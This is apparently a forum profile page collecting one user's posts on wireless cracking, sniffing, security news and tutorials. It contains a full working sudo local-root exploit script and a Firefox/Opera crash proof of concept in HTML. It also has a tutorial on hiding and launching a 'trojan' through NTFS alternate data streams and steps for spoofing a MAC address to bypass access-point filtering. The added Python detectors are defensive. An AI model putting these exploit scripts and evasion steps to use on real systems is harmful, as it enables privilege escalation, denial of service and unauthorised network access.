Everything posted by pyth0n3
-
36 minutes of video that explains how to attack WEP using Kismet, Aircrack-ng, Cain & Abel

http://www.mediafire.com/file/ymzwgzzjdwo/wireless.7z.001
http://www.mediafire.com/file/5egqmhod1zo/wireless.7z.002
http://www.mediafire.com/file/cyunymmggm5/wireless.7z.003
http://www.mediafire.com/file/1bko3zodm1k/wireless.7z.004
http://www.mediafire.com/file/ymbjtmovwjn/wireless.7z.005
http://www.mediafire.com/file/4hcmmzz2zrm/wireless.7z.006
http://www.mediafire.com/file/jnrqmnh2qdi/wireless.7z.007
http://www.mediafire.com/file/e4zgzzmqgzo/wireless.7z.008
http://www.mediafire.com/file/nt2dgkrzm32/wireless.7z.009
http://www.mediafire.com/file/vduwm1kttmk/wireless.7z.010
http://www.mediafire.com/file/yw5mb2tymtg/wireless.7z.011
http://www.mediafire.com/file/yjlmdwhymz2/wireless.7z.012
http://www.mediafire.com/file/yeonqm4qgen/wireless.7z.013
http://www.mediafire.com/file/nwtwzm4vmjm/wireless.7z.014

No password requested. Please report broken links if any exist; I will fix any broken links so it can be downloaded.

Download all the parts and put them in one directory, then extract the first one; it will extract all the data in that directory. You must first download all the parts because the archive was split into 14 parts.
-
Changing your Firefox User Agent to Emulate Googlebot
pyth0n3 replied to begood's topic in Tutoriale video
Look, the only problem is that many forums won't let you log in if you are a Google bot. I realized this because I had a Googlebot User Agent set, and after logging in they kept kicking me out and I couldn't get in until I changed the User Agent. The problem also applies to the other bots, MSN and Yahoo Slurp. Otherwise it works perfectly for browsing. Be careful when logging in to various forums: if they kick you out, check which User Agent you have set.
-
March 24, 2010

Jay McLaughlin has me worried. I do my online banking from the same home computer the rest of the family uses for Web surfing and online games. I have the McAfee security suite loaded and do regular scans so accessing online banking should be protected. Right?

Not really, says McLaughlin, a Certified Information Security Professional and CIO of CNL Bank. Accessing online banking from your everyday PC is just asking for trouble, he says. In fact, the CIO of the Orlando, Florida-based regional bank would like to see all of his customers - both consumers and businesses - access online banking either from a dedicated machine or from a self-booting CD-ROM running Ubuntu Linux and Firefox.

The Ubuntu option

Recognizing that most consumers don't want to buy a separate computer for online banking, CNL is seriously considering making available free Ubuntu Linux bootable "live CD" discs in its branches and by mail. The discs would boot up Linux, run Firefox and be configured to go directly to CNL Bank's Web site. "Everything you need to do will be sandboxed within that CD," he says. That should protect customers from increasingly common drive-by downloads and other vectors for malicious code that may infect and lurk on PCs, waiting to steal the user account names, passwords and challenge questions normally required to access online banking.

A bootable CD works because it's isolated from the host PC environment. Malware on the host can't touch it - and any malware picked up when running from the CD-ROM goes away once the CD is ejected. "When you eject the CD you have removed everything off the machine," McLaughlin says.

He thinks that security suites are increasingly ineffective at keeping up with threats from organized crime rings abroad, such as the Russian Business Network. Right now business users are feeling the heat, but he says consumers are being targeted as well. He's so worried about drive-by downloads, in fact, that he uses Firefox with the NoScript plug-in, which won't allow any JavaScript to execute on his PC without his explicit permission.

"If you are using online banking you should be using a hardened system that is not used for anything else but online banking," McLaughlin says. While the FDIC, American Banking Association and Federal Financial Institutions Examination Council have come out with similar recommendations for commercial customers, McLaughlin says consumers need to follow them as well.

Raimund Genes, chief technology officer at security software vendor Trend Micro, calls the security measures used for online banking in the U.S. "a joke." Any key logger can grab the user name, password and answers to challenge questions that banks commonly use to authenticate users today, he says.

Going out of band

Genes says using your regular home PC is acceptable for online banking so long as the bank supports two-factor authentication. For example, some banks in Europe use a transaction authentication number, an authentication code that's sent to the user "out of band," such as via SMS to a cell phone. The user then enters the code into the Web browser to complete a transaction online. The code changes every time the user makes a new request. Another alternative is a smart token, such as an RSA token. Barring that, he says, "I would not do online banking at all. Or if I had to I would use a sandboxed browser. I would boot up a mini Linux system from a USB stick."

CNL Bank currently offers out of band authentication only when setting up an initial password on a new online account or for password reset requests. The authentication code can be transmitted via SMS, using an automated attendant that calls a phone number that the customer has set up in advance, or through e-mail (although McLaughlin says the e-mail option may be discontinued because a compromised machine may have compromised e-mail as well).

McLaughlin is also considering offering this mechanism as an authentication option each time the user logs in, and CNL may offer an even more granular option that requires out of band authentication for individual transactions - for example, for commercial customers with high risk transactions such as wire transfers.

Flash or CD-ROM?

When accessing online banking, consumers may want to consider using a secure, bootable flash drive running an environment such as U3 or MojoPak, says John Pescatore, analyst with Gartner Inc. But banks like the idea of the Ubuntu distribution because the software is free and the media is much cheaper than a memory stick. The problem with both is that the user now has to carry something to access online banking. "They hate that. That's why this approach has never broken into the mainstream," Pescatore says.

Consumers could also access online banking from a separate, bootable partition on their PC, but that's probably more work than most consumers would put up with. Another alternative, hosting a separate virtual machine (VM), is better than nothing. But McLaughlin cautions that the VM is still not totally isolated from the PC. Malware that targets the hypervisor layer underlying the VM may find its way around those defenses.

Everyone is unanimous on one point, however: Nobody seems to think doing online banking from the machine you use every day for Web surfing and e-mail is a good idea.

McLaughlin thinks the bootable Ubuntu CD option may be the best alternative right now. Regardless of who you bank with, he suggests ordering a copy of the free Ubuntu Desktop Edition self-booting CD (If you don't want to wait you can download the image and burn it on a CD yourself) and try it for your online banking.

McLaughlin and Genes put a sufficient scare into me that I've decided to give it a go. Yes, it's a hassle to reboot for online banking - until you think of what could happen if someone stole your credentials. On the plus side, I'll be exposed to Linux on a regular basis. Who knows? I might decide that I like running Linux for more than just online banking.

computerworld.com
-
First check whether the driver is installed, and what kind of client are you using for Network-Manager? And of course describe more so that we understand; that way you will get a clearer answer.
-
Yahoo!Messenger Monitor Sniffer v3.0 (I've added the serial number)
pyth0n3 replied to EthicalHacker's topic in Programe hacking
Well, if you put the network in promiscuous mode you can intercept all these conversations with any sniffer, for example Wireshark, because for Yahoo Messenger they do not arrive encrypted. If it is not in promiscuous mode you will only see your own conversations.

On Linux it can be done with the following command.

To enable the promiscuous mode:

    ifconfig eth0 promisc

To remove promiscuous mode:

    ifconfig eth0 -promisc
-
I would attend something like that too, because I liked what Avram Iancu, nicknamed "Craisorul Muntilor", did. For those who have not been, I recommend also going to visit the Avram Iancu Memorial House, which I visited 12 years ago and which is located in the commune of Avram Iancu, coming from the town of Campeni.
-
What do you recommend for wireless compatible with WEP cracking?
pyth0n3 replied to Krisler12's topic in Wireless Pentesting
I have never been to Spain.
-
What do you recommend for wireless compatible with WEP cracking?
pyth0n3 replied to Krisler12's topic in Wireless Pentesting
Take a look here at which drivers are compatible with Aircrack-ng: compatibility_drivers [Aircrack-ng], because it is a very complete tool for WEP and WPA. See which adapters are better; I would recommend Realtek or Atheros.
-
Well, I wrote it myself.
-
Credits in what sense? I don't understand what you said.
-
So here I will explain a simple way to hide and execute files on a Windows system.

The first thing will be the command attrib. Here is the syntax:

    +    Sets an attribute.
    -    Clears an attribute.
    R    Read-only file attribute.
    A    Archive file attribute.
    S    System file attribute.
    H    Hidden file attribute.
    /S   Processes matching files in the current folder and all subfolders.
    /D   Processes folders as well.

So here is an example:

    attrib +h trojan.exe

This command will add the hidden attribute to trojan.exe and it will not be seen.

    attrib -h trojan.exe

This command will show the hidden file, in our case trojan.exe.

Another way to hide files in an NTFS file system will be the Alternate Data Stream, so this can also be used in Windows Vista. It does not work in a FAT file system.

So here is a short example of this. Go to Start>Run>CMD and now make a folder for this example. I've made this folder in c:, so when you open CMD just type

    cd c:\

and then make a directory for this example called test

    mkdir test

then go to that directory

    cd \test

So we can begin. We will create a text file called ads.txt, which stands for Alternate Data Stream, and we will hide another text file behind ads.txt. The hidden file will be hidden.txt and we will put some text in this hidden.txt file. The file ads.txt will be empty, so here is the syntax:

    echo This is an Alternate Data Stream hidden file > ads.txt:hidden.txt

The next step will be reading the hidden file, so we will type the following command:

    notepad ads.txt:hidden.txt

Here we are using notepad to read what is inside the file hidden.txt.

OK, so let's see how we can hide and execute a trojan horse. In the next example I will use the calc.exe tool because this tool exists on any computer with a Windows-based system. So let's say that calc.exe is a trojan horse and we need to hide this trojan behind another file using the Alternate Data Stream. In this example we will hide calc.exe in the ads.txt file that already has another file hiding in it, so the syntax will be:

    type c:\windows\system32\calc.exe > ads.txt:trojan.exe

So here we hide calc.exe and we called it trojan.exe. Let's execute this Alternate Data Stream:

    start c:\test\ads.txt:trojan.exe

Here a simple calc must appear on the screen, but what if this calc was a trojan horse? Another simple way to execute this can also be:

    start .\ads.txt:trojan.exe

So here we need to delete this Alternate Data Stream. We can simply copy the file ads.txt to a USB pen with a FAT file system and all data hidden behind this file will be deleted. Another way will be:

    type ads.txt > adscopy.txt
    del ads.txt
    ren adscopy.txt ads.txt

And we will have an ads.txt file without anything hidden or pending.

Countermeasure for Alternate Data Stream:

There are many tools that can find an ADS on your computer:

Crucialads (Crucial Security Programs—Security and Services)
Streamexplorer (Stream Explorer)

So here are some pictures with Streamexplorer that I've made to see how this tool can detect ADS:

ScreenHunter_07 Mar. 13 17.44.gif
ScreenHunter_10 Mar. 13 17.46.gif

Here you will see all the hidden data behind ads.txt, which is an empty file.

Another way to hide files can be Steganography (Steganography - Wikipedia, the free encyclopedia), and here you can find many tools to use: StegoArchive.Com - Steganography Information, Software, and News to Enhance Your Privacy

edit: Written by pyth0n3
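A detection sketch for the countermeasure step above, added here and not part of the original post: it parses the text that `dir /R` prints (the switch lists alternate data streams on Windows Vista and later) and reports every named stream except the Zone.Identifier marker Windows attaches to downloads. The sample listing is constructed, the directory header match assumes English-locale output, and the function and class names are hypothetical.

```python
import re
from dataclasses import dataclass

# " Directory of C:\test" header printed by an English-locale cmd.exe (assumption).
DIR_HEADER = re.compile(r"^\s*Directory of (.+?)\s*$")
# Stream rows are indented and look like "   47 ads.txt:hidden.txt:$DATA".
STREAM_ROW = re.compile(r"^\s+(\d[\d.,]*)\s+(.+?):([^:]+):\$DATA\s*$")

# Streams that are expected on ordinary systems and are not reported.
BENIGN_STREAMS = {"zone.identifier"}
# Stream names that suggest a program is stored behind the host file.
EXEC_EXTENSIONS = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".js")


@dataclass
class StreamFinding:
    directory: str
    host_file: str
    stream: str
    size: int
    reason: str


def find_named_streams(dir_r_output):
    """Return a StreamFinding for every non-benign named stream in `dir /R` text."""
    findings = []
    directory = ""
    for line in dir_r_output.splitlines():
        header = DIR_HEADER.match(line)
        if header:
            directory = header.group(1)
            continue
        row = STREAM_ROW.match(line)
        if not row:
            continue  # ordinary file row, <DIR> row, or summary line
        size_text, host_file, stream = row.groups()
        if stream.lower() in BENIGN_STREAMS:
            continue
        size = int(re.sub(r"[.,]", "", size_text))  # drop thousands separators
        if stream.lower().endswith(EXEC_EXTENSIONS):
            reason = "executable-named stream"
        else:
            reason = "unexpected named stream"
        findings.append(StreamFinding(directory, host_file, stream, size, reason))
    return findings


# Constructed sample mirroring the tutorial's C:\test folder, plus one downloaded
# file that carries only the benign Zone.Identifier stream.
SAMPLE_DIR_R = r"""
 Directory of C:\test

03/13/2010  05:40 PM    <DIR>          .
03/13/2010  05:40 PM    <DIR>          ..
03/13/2010  05:44 PM                 0 ads.txt
                                    47 ads.txt:hidden.txt:$DATA
                               114,688 ads.txt:trojan.exe:$DATA
03/13/2010  05:50 PM            52,224 setup.zip
                                    26 setup.zip:Zone.Identifier:$DATA
               2 File(s)         52,224 bytes
"""

if __name__ == "__main__":
    for f in find_named_streams(SAMPLE_DIR_R):
        print(f"{f.directory}\\{f.host_file}:{f.stream} ({f.size} bytes) - {f.reason}")
```

A zero-byte host file with a large stream behind it, as with ads.txt here, is the pattern the tutorial produces and a reasonable thing to triage first.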
-
Never Installed a Firewall on Ubuntu? Try Firestarter
pyth0n3 posted a topic in Tutoriale in engleza
Introduction

If I have an option of giving a brief description about firewall I would say “a program or hardware device that filters the information coming through the Internet connection into your private network or computer system. If an incoming packet of information is flagged by the filters, it is not allowed through.” A firewall does not guarantee security but it is in most environments the first line of defense against network based attacks.

Firestarter is a friendly graphical interface that allows you to configure a software firewall in Linux using the built-in IPtables/IPchains utilities. It is an open source GUI firewall program. The software aims to combine ease of use with powerful features, therefore serving both Linux desktop users and system administrators.

By the end of this article, the user will be able to install and configure Firestarter and will also be able to live a secure and healthy life... over the internet.

Prerequisites

This howto assumes you have Ubuntu installed on your machine with internet connection.

Note: This tool should NOT be used on any production machine.

Install Firestarter

Firestarter is very simple, "even a caveman can install it". It's contained in most distributions' repositories. In Ubuntu and Debian-based distributions, Firestarter can be installed by running:

    $ sudo apt-get install firestarter

This will install Firestarter and all necessary dependencies.

Setup Wizard

In order to start the Firestarter application, click on System > Administration > Firestarter. When you run Firestarter for the first time it will allow you to set up your initial firewall configuration.

In the initial step it will detect your network devices and then give you the option to select your network device from a drop-down menu. You also have an option of enabling dial-out (for modem users) or indicating that the IP address is assigned via DHCP. If you are using a router for internet connection then check your router's settings to see if you are using DHCP to assign local IP addresses (it would be DHCP if you did not configure a static IP). If you're not using a router, whether or not you have a dynamically-assigned IP address depends upon your Internet Service Provider.

Once you check the options according to your network settings, click forward. It will now ask you to configure Internet Connection Sharing. If the system you are installing on is a network computer then you should enable this. You also have to select the device type of your network (mostly a hub or switch). Leave the Internet Connection Sharing disabled if you're not using your computer as a router. Next, it will ask you to save your settings and open Firestarter.

The GUI

The Firestarter main application window consists of three tabs: Status, Events, and Policy. These three tabs are described below:

Status

This window gives you the current status of your firewall application: whether it is active, disabled or locked. It consists of three states:

Active: Indicates the firewall is up and running
Disabled: Indicates the firewall is turned off and all connections are allowed through
Locked: Indicates all connections are refused

Events

The Events tab consists of the list of attempted connections that it has blocked. Here you should focus on the entries that are listed in red; all others should not be considered as a threat.

Policy

The Policy window is where you define the rules for your firewall. You can create your own policy which includes enabling/disabling of inbound or outbound traffic. And these rules can be applied on hosts or ports. You can create your own rule by right clicking on the desired list of hosts or ports and then selecting “Add Rule”.

For example, if you are running an SSH server you want to add a rule on the bottom list, selecting "SSH" for the service name, and Firestarter will automatically fill in the default port (in this case, port 22). You can then set whether you want to allow connections from all addresses ("Anyone"), or whether you want to limit connections by IP address, hostname, or network. It is not recommended to check the “Anyone” option since it could allow anyone to compromise your network security. Assigning an IP/host or network is a more secure option.

Inbound Policy controls the incoming traffic coming from the internet and the local network to the firewall. The default setting for inbound is appropriate. However, it can create exceptions if you modify the changes in accordance with your needs. The three inbound policy groups are:

Allow connections from host: The name itself is pretty explanatory. It will allow the traffic from the host which you will add here; it marks it as a trusted source.
Allow service: It consists of two parameters, the service and the target. Firestarter will try to determine the service name itself, but the user is also free to enter the name manually. The target can be one of three choices: Anyone, LAN clients, or a user specified IP, host or network.
Forward service: The last inbound policy group is Forward Service. This group is only active if you have enabled Internet Connection Sharing. It also consists of two parts, service and the target.

Outbound Policy controls outgoing traffic to the Internet from the firewall and any LAN clients. The default outbound policy is permissive. This means you and any clients connected to the local network are able to browse the net, read email, etc. unrestricted.

Permissive mode

The permissive outbound mode, marked "Allow outbound traffic not denied" on the policy page, allows you to specify rules that limit outbound connections.

Restrictive mode

The restrictive outbound mode on the other hand, marked "Deny outbound traffic not allowed" on the policy page, means you explicitly specify which connections are allowed out. When this mode is enabled for the first time some basic rules are already present in the system. These rules permit the secured hosts to access the DNS, DHCP and HTTP services so that you do not accidentally end up in a situation where you are unable to reach the web or further assistance. Once you know for sure you wish to enable the restrictive outbound policy, you can freely remove these rules.

Preferences

Firestarter walks you through the basic steps but in order to experience some advanced features you can go to preferences.

Interface

Firestarter does not interrupt your work. Here you have an option of minimizing Firestarter to the system tray. By doing so it will not exit the application and Firestarter will be running in the background and will notify you of any suspicious blocked alert by turning its icon red.

ICMP Filtering

The Internet Control Message Protocol (ICMP) provides a way for IP stacks to send simple messages containing information or errors. Here you are able to optimize the ICMP settings. The options “Echo Request” and “Echo Reply” advert to how your firewall handles pings. You can check the option of echo request and it will allow all the outgoing pings. If you would like to block the incoming pings you can check the option of echo reply. ICMP Filtering carries other options as well. One of the options that ICMP filtering includes is Traceroute, which can prevent your machine from being traced via traceroute.

ToS Filtering

This option allows you to set priority on the use of network traffic. It can set the priorities for the processes of your workstation and server (if you have installed both). In short, you have the option of increasing or decreasing the throughput or reliability for certain applications. Please review Firestarter documentation to learn more.

Conclusion

“The way to be safe is never to feel secure”. When we use high-speed internet without having any security tool installed, it gives an enormous opportunity to “them”, meaning the malicious folks on the internet who are desperate to attack your network and servers. No one can guarantee 100% security but at least you can consider yourself in the loop of reasonable security using Firestarter, without having any prerequisite of in-depth knowledge of TCP/IP security.

linuxsecurity.com
-
9 March 2010
InfoSecNews

Software that can be downloaded for use with the Energizer Duo USB battery charger contains a backdoor that could allow an attacker to remotely take control of a Windows-based PC, Energizer and US-CERT are warning.

"The installer for the Energizer Duo software places the file UsbCharger.dll in the application's directory and Arucer.dll in the Windows system32 directory," the U.S. Computer Emergency Readiness Team said in an advisory on Friday. "Arucer.dll is a backdoor that allows unauthorized remote system access via accepting connections on 7777/tcp. Its capabilities include the ability to list directories, send and receive files, and execute programs."

The Windows software was made available via a download with the Energizer Duo Charger, Model CHUSB, Energizer said in a statement. The battery maker said it does not know how the Trojan got into the software.

"Energizer has discontinued sale of this product and has removed the site to download the software," the statement said. "Energizer is currently working with both CERT and U.S. government officials to understand how the code was inserted in the software."

For systems with the software installed, US-CERT recommends removing the Energizer Duo software and Arucer.dll file, as well as blocking access to port 7777 via network perimeter devices or firewall software.

The Trojan may have been in the software since it was first offered three years ago, according to Symantec.

"We were interested in finding out how long this file had been available to the public. The compile time for the file is May 10, 2007. It is impossible to say for sure that this Trojan has always been in this software, but from our initial inspection it appears so," Symantec wrote in a blog post. "The Trojan still operates whether this device is found or not, so a USB charger doesn't need to be plugged in for the Trojan to be functioning."

If the Trojan does date back to 2007, that is around the same time that there was a rash of products like digital photo frames hitting U.S. shelves infected with malware, said Marcus Sachs, director of the SANS Internet Storm Center.

"This may simply be from that time frame when all the factories in China were not clean and many were putting malware onto stuff, not intentionally but because the hygiene wasn't good," he said in an interview on Monday.

"Who knows where the server (hosting the software) is located," he said. "It could have been exposed to the unclean conditions that were rampant there."
-
- The Prince by Niccolò Machiavelli, written in 1513, not published until 1532 (The Prince - Wikipedia, the free encyclopedia)
- Hacker 6.0 by Stuart McClure, Joel Scambray, George Kurtz
- The Magic of Thinking Big by David Schwartz
- Letter to a Child Never Born by Oriana Fallaci
- VOICE OF THE MASTER by Kahlil Gibran
-
07 March 2010
offensive-security.com

A few days ago, one of my friends (mr_me) pointed me to an application that appeared to be acting somewhat “buggy” while processing “specifically” crafted zip files. After playing with the zip file structure for a while (thanks again, mr_me, for documenting the zip file structure), I found a way to make the application crash and overwrite an exception handler structure.

In this article, I will explain the steps I took to build an exploit for this bug. All I’m asking from you, the reader, is to try not just to read this post and take my steps and decisions for granted. Read it, and think about what you see, and try to think about what you would do to fix a certain issue. Whenever a new problem arises, try to see if you can find the solution yourself before continuing to read.

In this post, I have placed a few markers. These markers indicate the moment when you should stop reading for a while and think about the current situation, the current questions and issues, and what YOU would do to overcome those issues.

continue ... QuickZip Stack BOF 0day: a box of chocolates
-
New BlackEnergy Trojan Targeting Russian, Ukrainian Banks
pyth0n3 posted a topic in Stiri securitate
Mar 04, 2010

SAN FRANCISCO -- RSA Conference 2010 -- Russian hackers have written a more sophisticated version of the infamous BlackEnergy Trojan associated with the 2008 cyberattacks against Georgia that now targets Russian and Ukrainian online banking customers.

Joe Stewart, a security researcher with SecureWorks, says Russian hackers are using the Trojan spread via the BlackEnergy botnet to hit Russian and Ukrainian banks with a two-pronged attack that steals their customers' online banking credentials and then wages a distributed denial-of-service (DDoS) attack on the banks as a cover: "They may be emptying the bank accounts while the banks are busy cleaning up from the DDoS," Stewart says.

Dubbed by Stewart as "BlackEnergy 2," this new version of the Trojan is a full rewrite of the code that features a modular architecture that supports plug-ins that can be written without access to its source code. It currently comes with three different DDoS plug-ins, as well as one for spamming and two for online banking fraud, according to Stewart.

And with the ability to target users in Russia and the Ukraine, BlackEnergy 2 is a departure from the tradition where many Russian hackers won't target their fellow countrymen or those from other former Soviet Republic countries. "The rules have changed," Stewart says. "There was once an unwritten rule that they didn't attack their own banks."

But like most cybercrime operations, money is money, and the BlackEnergy botnet gang appears to be expanding its operations for more profit.

Stewart says he has seen no public release of the development kit for BlackEnergy 2, but he was able to match "fingerprints" in the code of this new version with other source code written by the author.

So far the attackers using the Trojan and its new plug-ins against banks in Russia and the Ukraine appear to be infecting banking customers via pay-per-install malware scams -- likely via email, according to Stewart, who has notified Russian and Ukrainian law enforcement authorities about the botnet's new activities.

And in an especially nasty twist, one plug-in destroys the victim's hard drive. "Then they can't log into their bank," Stewart says. "But we've not seen that" being used in attacks yet, he says.

While the Zeus Trojan remains the most popular Trojan, Stewart says BlackEnergy 2 can do things Zeus cannot, such as stealing online credentials plus DDoS'ing. BlackEnergy 2 also steals the user's private encryption key.

Stewart has written an analysis of the Trojan, available here: BlackEnergy Version 2 Analysis - Research - SecureWorks.

So far the BlackEnergy 2 Trojan is targeting only Russian and Ukrainian online banking customers, but Stewart also has spotted two other banking Trojans that also target only Russian and former Soviet Union banking customers.

darkreading.com
-
This training will end with a final amazing exercise through a step by step live hacking simulation. It will help students at coming back to offensive and defensive hands-on exercises seen during the whole day, thanks to this complete information warfare operation. TEHTRI-Security will be at CANSECWEST 2010 in Vancouver (22-26 march). There, we will give a security training. Training: http://www.tehtri-security.com/Advanced_PHP_Hacking.pdf CanSecWest Applied Security Conference: Vancouver, British Columbia, Canada - TEHTRI-Security
-
Severity: HIGH

To see if your sudo is vulnerable type sudo -V

The utility is prone to a local privilege-escalation vulnerability because it fails to correctly validate certain nondefault rules in the 'sudoer' configuration file. This issue occurs in the 'sudo/parse.c' source file. Users in supplementary groups may gain 'root' user privileges. Local attackers could exploit this issue to run arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer.

Affected Products

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
Ubuntu 9.10

And also other Linux distributions that use Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4

---snip---
#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh <file you have permission to edit>"
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1
---snip---

cheers, kingcope
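The version check the post asks for, written out as an added example that is not part of the original advisory: it parses the `Sudo version ...` line that `sudo -V` prints and compares it with the two ranges quoted above (1.6.x before 1.6.9p21, 1.7.x before 1.7.2p4). The host names and inventory are constructed and the function names are hypothetical.

```python
import re
import subprocess

# Upstream sudo versions look like 1.7.2p1: major.minor.patch plus optional pN.
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

# First fixed (patch, plevel) per branch, taken from the ranges in the post.
FIRST_FIXED = {(1, 6): (9, 21), (1, 7): (2, 4)}


def parse_sudo_version(text):
    """Extract (major, minor, patch, plevel) from `sudo -V` output or a bare version."""
    match = VERSION_RE.search(text)
    if match is None:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, patch = (int(match.group(i)) for i in (1, 2, 3))
    plevel = int(match.group(4) or 0)  # "1.7.2" is treated as 1.7.2p0
    return major, minor, patch, plevel


def in_affected_range(text):
    """True when the upstream version falls inside the ranges the post lists."""
    major, minor, patch, plevel = parse_sudo_version(text)
    fixed = FIRST_FIXED.get((major, minor))
    return fixed is not None and (patch, plevel) < fixed


def audit(inventory):
    """Split {host: banner} into hosts in the affected range and hosts to check by hand."""
    report = {"affected": [], "unknown": []}
    for host, banner in sorted(inventory.items()):
        try:
            if in_affected_range(banner):
                report["affected"].append(host)
        except ValueError:
            report["unknown"].append(host)  # banner missing or unparseable
    return report


def local_sudo_banner():
    """First line of `sudo -V` on this machine, or an empty string if sudo is absent."""
    try:
        result = subprocess.run(["sudo", "-V"], capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return ""
    lines = result.stdout.splitlines()
    return lines[0] if lines else ""


# Constructed inventory: first line of `sudo -V` as collected from each host.
SAMPLE_INVENTORY = {
    "web01": "Sudo version 1.6.9p20",
    "web02": "Sudo version 1.6.9p21",
    "db01": "Sudo version 1.7.2p1",
    "db02": "Sudo version 1.7.2p4",
    "build01": "Sudo version 1.7.0",
    "jump01": "sudo: command not found",
}

if __name__ == "__main__":
    print(audit(SAMPLE_INVENTORY))
    banner = local_sudo_banner()
    if banner:
        # Distributions may backport the fix without changing the upstream version
        # string, so a match here is a prompt to check the vendor package version.
        print(banner, "-> in affected range:", in_affected_range(banner))
```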
-
Ok thanks! Useful things. Can also take a look at this Quick Reference for Nmap: Professor_Messer_Nmap_Quick_Reference_Guide.pdf
-
Mozilla Firefox v3.6 and Opera Long String Crash (0day) Exploit
pyth0n3 posted a topic in Exploituri
===============================================================
Mozilla Firefox v3.6 and Opera Long String Crash (0day) Exploit
===============================================================

#Vulnerability

This bug is a typical result when an attacker tries to write a very long string in the document.write() function. User interaction is required to exploit this vulnerability in that the target must visit a malicious web page.

#Impact

Mozilla Crash

#Proof of concept

Copy the code into a text file and save it as "asheesh.html", close all tabs and windows to avoid any loss of data, open it in Mozilla Firefox and wait for 15 sec ...... and say Good Bye Mozilla ....... But before that, pay your last respects to Mozilla. Say it with love: Jai Mata Di. Mozilla Rest In Piece!!!!!!!!!!!!!!!!!!!!!!!!!!!

========================================================================================================================
asheesh.html
========================================================================================================================
<html>
<title>asheesh kumar mani tripathi</title>
</br>Asheesh kumar Mani Tripathi
<head>
<script>
function asheesh ()
{
var i=24 , anaconda = "XXXX"
for(i=24;i >0 ;--i)
{
anaconda=anaconda+anaconda;
}
document.write(anaconda);
}
</script>
</head>
<body onLoad="asheesh()"></body>
</html>

# ~ - [ [ : Inj3ct0r : ] ]
-
A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo What? Various web application security testing tools and vulnerable web applications were added to a clean install of Ubuntu v9.10. Why? The Web Security Dojo is for learning and practicing web app security testing techniques. It is ideal for training classes and conferences since it does not need a network connection. The Dojo contains everything needed to get started - tools, targets, and documentation. Where? Download Web Security Dojo from Browse Web Security Dojo Files on SourceForge.net. How? To install Dojo you can install and run VirtualBox, then "Import Appliance" using the Dojo's OVF file. Go here for Virtual Box instructions. As of version 1.0 a VMware version is also provided. Who? Sponsored by Maven Security Consulting Inc (performing web app security testing & training since 1996).
-
How can you get the password of an access point?
pyth0n3 replied to mc_claus's topic in Wireless Pentesting
So in these cases the administrator sets up MAC control for each client he approves so that it can connect to an AP. A simple wireless sniffer lets you see any station's MAC; in that case you can change your own so that it is an approved one.

AiroPeek (AiroPeek SE 3.0.1 software download - Windows - VersionTracker) lets you view the MAC addresses; you only have to monitor that network. After that you can change your MAC address.

Windows: disable the network card, use BWMACHAK.exe
C:\>BWMACHAK.exe 0003t4h6d8
then enable the card and run ipconfig/all to see whether the MAC address has changed.

Linux:
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:45:7j:65:ki:ff
ifconfig wlan0 up
ifconfig wlan0

You just have to use a sniffer; you need to know a little TCP/IP, or at least how to use a sniffer and read the results. In any case, for wireless pentesting Linux systems are of course used; they have plenty of tools and are much more compatible than Windows.

The standard method of an attack is the following:
1 footprinting
2 scanning & enumeration (in a single phase for wireless networks)
3 penetration
4 DoS (Denial of Service)

Packets are captured and analysed, then you proceed to crack the password, WEP or WPA.
-
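Since the reply above on MAC control points out that an approved MAC can be read off the air and reused, the filter list is something to monitor rather than rely on. The following is an added example, not part of the original post: it flags a MAC address whose 802.11 sequence counter keeps jumping, which is what two radios sharing one address look like in a capture. The frame tuples, thresholds and function names are assumptions, and the sample frames are constructed.

```python
from collections import defaultdict

SEQ_MOD = 4096  # the 802.11 sequence number is 12 bits and wraps at 4096


def seq_gap(prev, cur):
    """Forward distance from prev to cur, modulo the 12-bit counter."""
    return (cur - prev) % SEQ_MOD


def find_shared_macs(frames, max_gap=64, min_jumps=3):
    """Return {mac: jump_count} for MACs that look like two transmitters.

    frames: iterable of (time_ms, source_mac, seq_number) taken from a
    monitor-mode capture. One radio advances its counter by small steps
    (0 for a retransmission); two radios sharing a MAC interleave two
    unrelated counters, so the gap keeps jumping. A single jump (client
    restart, roaming) stays below min_jumps and is not reported.
    Assumption: non-QoS counters; QoS data uses one counter per TID, so
    real input should be keyed by (mac, tid).
    """
    last_seq = {}
    jumps = defaultdict(int)
    for _, mac, seq in sorted(frames):
        if mac in last_seq and seq_gap(last_seq[mac], seq) > max_gap:
            jumps[mac] += 1
        last_seq[mac] = seq
    return {mac: n for mac, n in jumps.items() if n >= min_jumps}


def build_sample():
    """Constructed capture: MACs and sequence numbers are made up."""
    frames, t = [], 0
    # Approved client and a second radio reusing its MAC, interleaved.
    for k in range(5):
        frames.append((t, "02:00:00:00:00:01", 100 + k))
        frames.append((t + 5, "02:00:00:00:00:01", 3000 + k))
        t += 10
    # Ordinary client whose counter wraps from 4095 to 0.
    for seq in (4094, 4095, 0, 1, 2):
        frames.append((t, "02:00:00:00:00:02", seq))
        t += 10
    # Client that restarted once: a single jump, not reported.
    for seq in (10, 11, 12, 500, 501):
        frames.append((t, "02:00:00:00:00:03", seq))
        t += 10
    return frames


if __name__ == "__main__":
    for mac, n in find_shared_macs(build_sample()).items():
        print(f"{mac}: {n} sequence jumps, possible cloned MAC")
```
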
Games = 0, because I'm no longer a child. Of course my wireless antenna won't be missing, because maybe I'll find something (you never know). I could also learn a new programming language, or at least learn better one I already know, because I played too much when I was a child and I certainly won't do it now, because I lost a lot, and if I carry on like that I won't even become a wannabe (I don't even think about hacker any more).

